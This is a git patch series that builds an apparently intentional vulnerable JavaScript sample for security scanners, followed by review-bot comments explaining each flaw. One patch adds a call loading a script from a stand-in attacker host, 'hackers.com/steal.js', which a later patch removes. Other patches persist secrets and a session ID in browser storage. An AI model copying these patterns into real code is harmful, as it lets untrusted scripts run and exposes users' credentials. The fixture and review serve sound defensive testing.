From b917e5745e123cd28b5beb67a30966e87c85ddc2 Mon Sep 17 00:00:00 2001
From: "J.P. Weiser"
Date: Tue, 11 Feb 2020 07:22:32 -0600
Subject: [PATCH 1/5] Add vulnerable JS code
---
 public/vulnerable.js | 7 +++++++
 1 file changed, 7 insertions(+)
 create mode 100644 public/vulnerable.js
diff --git a/public/vulnerable.js b/public/vulnerable.js
new file mode 100644
index 0000000..6069bf1
--- /dev/null
+++ b/public/vulnerable.js
@@ -0,0 +1,7 @@
+function include(url) {
+ var s = document.createElement("script");
+ s.setAttribute("type", "text/javascript");
+ s.setAttribute("src", url);
+ document.body.appendChild(s);
+}
+include("http://hackers.com/steal.js") // Noncompliant
From d1e4d05374c4ff93bddc5f29caa9d1614df9b8a1 Mon Sep 17 00:00:00 2001
From: "J.P. Weiser"
Date: Tue, 11 Feb 2020 07:26:17 -0600
Subject: [PATCH 2/5] Update vulnerable.js
---
 public/vulnerable.js | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)
diff --git a/public/vulnerable.js b/public/vulnerable.js
index 6069bf1..0c0ff16 100644
--- a/public/vulnerable.js
+++ b/public/vulnerable.js
@@ -1,7 +1 @@
-function include(url) {
- var s = document.createElement("script");
- s.setAttribute("type", "text/javascript");
- s.setAttribute("src", url);
- document.body.appendChild(s);
-}
-include("http://hackers.com/steal.js") // Noncompliant
+var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);
From e91b27bf087d3512f173ece06510ad9c1f85bac6 Mon Sep 17 00:00:00 2001
From: "J.P. Weiser"
Date: Tue, 11 Feb 2020 07:29:25 -0600
Subject: [PATCH 3/5] Update vulnerable.js
---
 public/vulnerable.js | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/public/vulnerable.js b/public/vulnerable.js
index 0c0ff16..ef5f4fa 100644
--- a/public/vulnerable.js
+++ b/public/vulnerable.js
@@ -1 +1,4 @@
 var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);
+
+const val = Math.random(); // Sensitive
+// Check if val is used in a security context.
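Review bot: `include(url)` builds a `<script>` element from whatever string it receives and appends it with no origin allow-list and no `integrity` attribute, so the sink is the function itself, not only the `// Noncompliant` call on the last line; the plaintext `http://` URL additionally leaves the fetched script open to modification in transit. If the file is a deliberate scanner fixture, a header comment such as `// Intentionally vulnerable sample: loads a script from an untrusted origin with no SRI` would make that explicit to the next reader; otherwise the call should go and `include` should accept only same-origin or SRI-pinned sources. The call on the last line also lacks a terminating semicolon.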
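Review bot: `window.openDatabase` (Web SQL) is non-standard and has been removed from current browsers, so in those the replacement line throws `TypeError: window.openDatabase is not a function`, while where it still exists the database description `"Personal secrets stored here"` signals that secrets are being persisted client-side, readable by any script running on the origin. If the line is meant to trip a scanner rule, a comment naming the concern, e.g. `// Sensitive: secrets persisted in client-side Web SQL storage`, would document that; if it is meant to run, guard it with `if (typeof window.openDatabase === 'function')` and keep secret material server-side.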
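Review bot: `val` is assigned from `Math.random()` and never read anywhere in the file, so the question posed by `// Check if val is used in a security context.` cannot be answered from this code and a reader has nothing to check. State the point directly instead, e.g. `// Sensitive: Math.random() is not cryptographically secure; use crypto.getRandomValues() for tokens, nonces or keys`, or show the use that makes the value sensitive.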
From 38a62d7ac4decf35c579f88a3b078ad5dc305cc8 Mon Sep 17 00:00:00 2001
From: "J.P. Weiser"
Date: Tue, 11 Feb 2020 07:31:28 -0600
Subject: [PATCH 4/5] Update vulnerable.js
---
 public/vulnerable.js | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/public/vulnerable.js b/public/vulnerable.js
index ef5f4fa..3fe79f1 100644
--- a/public/vulnerable.js
+++ b/public/vulnerable.js
@@ -1,4 +1,9 @@
-var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);
+for (i = 1; i<5; i++) {
+ // Print i to the Output window.
+ Debug.write("loop index is " + i);
+ // Wait for user to resume.
+ debugger;
+}
 const val = Math.random(); // Sensitive
 // Check if val is used in a security context.
From 26a6e9e7ad348c3e3c32187df58b034de9005827 Mon Sep 17 00:00:00 2001
From: "J.P. Weiser"
Date: Tue, 11 Feb 2020 07:36:18 -0600
Subject: [PATCH 5/5] Update vulnerable.js
---
 public/vulnerable.js | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/public/vulnerable.js b/public/vulnerable.js
index 3fe79f1..39a3407 100644
--- a/public/vulnerable.js
+++ b/public/vulnerable.js
@@ -5,5 +5,12 @@ for (i = 1; i<5; i++) {
 debugger;
 }
+localStorage.setItem("login", login);
+sessionStorage.setItem("sessionId", sessionId);
+
+if(unexpectedCondition) {
+ alert("Unexpected Condition");
+}
+
 const val = Math.random(); // Sensitive
 // Check if val is used in a security context.
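Review bot: `for (i = 1; i<5; i++)` assigns to an undeclared `i`, creating an implicit global in sloppy mode and throwing `ReferenceError` under `'use strict'`, and `Debug.write` is not a browser API, so the loop body fails on its first iteration unless something else defines `Debug`. The `debugger` statement halts execution whenever devtools are open. Declare the index with `for (let i = 1; i < 5; i++) {`, and either replace `Debug.write(...)` with `console.log(...)` or mark the block as a deliberate scanner trigger with a comment such as `// Intentionally left in: debugger statement and non-standard Debug API`.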
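Review bot: `login`, `sessionId` and `unexpectedCondition` are referenced but declared nowhere in the file, so `localStorage.setItem("login", login)` throws `ReferenceError` before anything else in the hunk runs unless another script supplies them as globals. Writing a session identifier to `sessionStorage` (and a login value to `localStorage`) also exposes it to every script executing on the origin, which is precisely the exposure an `HttpOnly` cookie avoids, and `alert` is a debugging aid rather than error handling. If the sample is meant to demonstrate those findings, a comment such as `// Sensitive: session identifier stored in Web Storage, readable by any same-origin script` would make the intent explicit; the `for` loop whose closing brace forms this hunk's context starts outside the hunk.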